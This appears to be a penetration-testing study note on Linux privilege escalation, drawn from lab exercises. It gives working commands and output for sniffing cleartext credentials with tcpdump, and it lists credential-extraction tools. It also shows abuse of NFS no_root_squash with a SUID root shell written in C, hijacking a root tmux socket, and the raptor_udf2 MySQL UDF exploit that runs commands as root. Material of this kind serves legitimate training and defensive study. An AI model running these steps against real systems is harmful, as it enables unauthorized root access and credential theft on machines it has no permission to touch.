Miscellaneous Techniques

Passive Traffic Capture

If tcpdump is installed, unprivileged users may be able to capture network traffic, including, in some cases, credentials passed in cleartext.

tcpdump -i 1 -w .d.pcap -s 0 'not tcp port 22' &

How to Find Passwords Using WiresharkInstructables

Examine data - Tools

GitHub - DanMcInerney/net-creds: Sniffs sensitive data from interface or pcapGitHub

net-creds

GitHub - lgandx/PCredz: This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.GitHub

PCreds

GitHub - odedshimon/BruteShark: Network Analysis ToolGitHub

BruteShark

GitHub - ShellCode33/CredSLayer: Extract credentials and other useful info from network capturesGitHub

CredSLayer

NetworkMiner - The NSM and Network Forensics Analysis Tool ⛏Netresec

NetMiner - Free Version

GitHub - mlgualtieri/NTLMRawUnHide: NTLMRawUnhide.py is a Python3 script designed to parse network packet capture files and extract NTLMv2 hashes in a crackable format. The following binary network packet capture formats are supported: *.pcap *.pcapng *.cap *.etlGitHub

Weak NFS Privileges

NFS (2049, 111)

showmount -e 10.129.2.12

When an NFS volume is created, various options can be set:

Option	Description
root_squash	If the root user is used to access NFS shares, it will be changed to the nfsnobody user, which is an unprivileged account. Any files created and uploaded by the root user will be owned by the nfsnobody user, which prevents an attacker from uploading binaries with the SUID bit set.
no_root_squash	Remote users connecting to the share as the local root user will be able to create files on the NFS server as the root user. This would allow for the creation of malicious scripts/programs with the SUID bit set.

$ cat /etc/exports

# /etc/exports: the access control list for filesystems which may be exported
#		to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/var/nfs/general *(rw,no_root_squash)
/tmp *(rw,no_root_squash)

Create a SETUID binary that executes /bin/sh using our local root user. We can then mount the /tmp directory locally, copy the root-owned binary over to the NFS server, and set the SUID bit

htb@NIX02:~$ cat shell.c 

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
  setuid(0); setgid(0); system("/bin/bash");
}

gcc shell.c -o shell

root@Pwnbox:~$ sudo mount -t nfs 10.129.2.12:/tmp /mnt
root@Pwnbox:~$ cp shell /mnt
root@Pwnbox:~$ chmod u+s /mnt/shell

htb@NIX02:/tmp$ ./shell
root@NIX02:/tmp# id

uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(htb)

References

NFS no_root_squash/no_all_squash misconfiguration PE - HackTricksbook.hacktricks.xyz

NFS Share no_root_squash – Linux Privilege Escalation -Juggernaut Pentesting Blog - A blog to help others achieve their goals in Cyber Security.

Example

osboxes@osboxes:~/Desktop$ sudo mount -t nfs 10.129.197.187:/tmp /mnt
osboxes@osboxes:~/Desktop$ cd /tmp

htb-student@NIX02:~$ cd /tmp
htb-student@NIX02:/tmp$ cp /bin/bash .

osboxes@osboxes:/mnt$ sudo chown root:root bash 
osboxes@osboxes:/mnt$ sudo chmod +s bash

htb-student@NIX02:/tmp$ ./bash -p

Hijacking Tmux Sessions

$  ps aux | grep tmux

root      4806  0.0  0.1  29416  3204 ?        Ss   06:27   0:00 tmux -S /shareds new -s debugsess

$ ls -la /shareds 

srw-rw---- 1 root devs 0 Sep  1 06:27 /shareds

$ id

uid=1000(htb) gid=1000(htb) groups=1000(htb),1011(devs)

$ tmux -S /shareds

id

uid=0(root) gid=0(root) groups=0(root)

MySQL running as root

ps -ef | grep mysql

The MySQL service is running as root

 * $ id
 * uid=500(raptor) gid=500(raptor) groups=500(raptor)
 * $ gcc -g -c raptor_udf2.c
 * $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
 * $ mysql -u root -p
 * Enter password:
 * [...]
 * mysql> use mysql;
 * mysql> create table foo(line blob);
 * mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
 * mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
 * mysql> create function do_system returns integer soname 'raptor_udf2.so';
 * mysql> select * from mysql.func;
 * +-----------+-----+----------------+----------+
 * | name      | ret | dl             | type     |
 * +-----------+-----+----------------+----------+
 * | do_system |   2 | raptor_udf2.so | function |
 * +-----------+-----+----------------+----------+
 
 # 1 - id
 
 * mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
 * mysql> \! sh
 * sh-2.05b$ cat /tmp/out
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 * [...]
 
 # 2- /bin/bash
 
 * mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
 * mysql> exit
 * /tmp/rootbash -p

MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)Exploit Database

MySQL User Defined Functions – Linux Privilege Escalation -Juggernaut Pentesting Blog - A blog to help others achieve their goals in Cyber Security.